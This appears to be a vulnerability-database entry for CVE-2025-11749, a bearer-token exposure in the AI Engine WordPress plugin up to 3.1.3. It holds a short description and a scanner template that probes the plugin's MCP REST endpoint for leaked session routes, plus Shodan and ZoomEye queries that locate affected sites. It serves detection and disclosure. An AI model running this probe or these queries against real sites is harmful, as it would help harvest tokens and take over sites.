漏洞描述
Unauthenticated sensitive information exposure in AI Engine WordPress plugin <= 3.1.3 exposes bearer tokens via REST API endpoints when No-Auth URL is enabled.
CVE-2025-11749: WordPress AI Engine Plugin - Token Exposure
PoC代码[已公开]
id: CVE-2025-11749
info:
name: WordPress AI Engine Plugin - Token Exposure
author: 4m3rr0r
severity: critical
description: |
Unauthenticated sensitive information exposure in AI Engine WordPress plugin <= 3.1.3 exposes bearer tokens via REST API endpoints when No-Auth URL is enabled.
reference:
- https://www.wordfence.com/blog/2025/11/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-ai-engine-wordpress-plugin/
- https://cve.mitre.org/cgi-bin/cvename/cgi?name=CVE-2025-11749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-11749
epss-score: 0.8566
epss-percentile: 0.99331
metadata:
max-request: 1
verified: true
vendor: wordpress
product: ai-engine
shodan-query: 'http.html:"/wp-content/plugins/ai-engine/"'
zoomeye-query: 'app:"WordPress" +web.body:"/wp-content/plugins/ai-engine/"'
tags: cve,cve2025,wordpress,wp-plugin,ai-engine,exposure,token,vkev
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/mcp/v1"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
condition: and
- type: regex
part: body
regex:
- '\"\\/mcp\\/v1\\/([^\\/"]+)\\/messages\":{'
- '\"\\/mcp\\/v1\\/([^\\/"]+)\\/sse\":{'
condition: and
# digest: 4a0a004730450221008d42e08ab2b427cd9462da3b5b90187995c2cdb64822e3b32887dbe64a4e5ac90220421a57196d31f151668a54b0e57682d6896cfb390934829c3a4b2d222852b64d:922c64590222798bb761d5b6d8e72950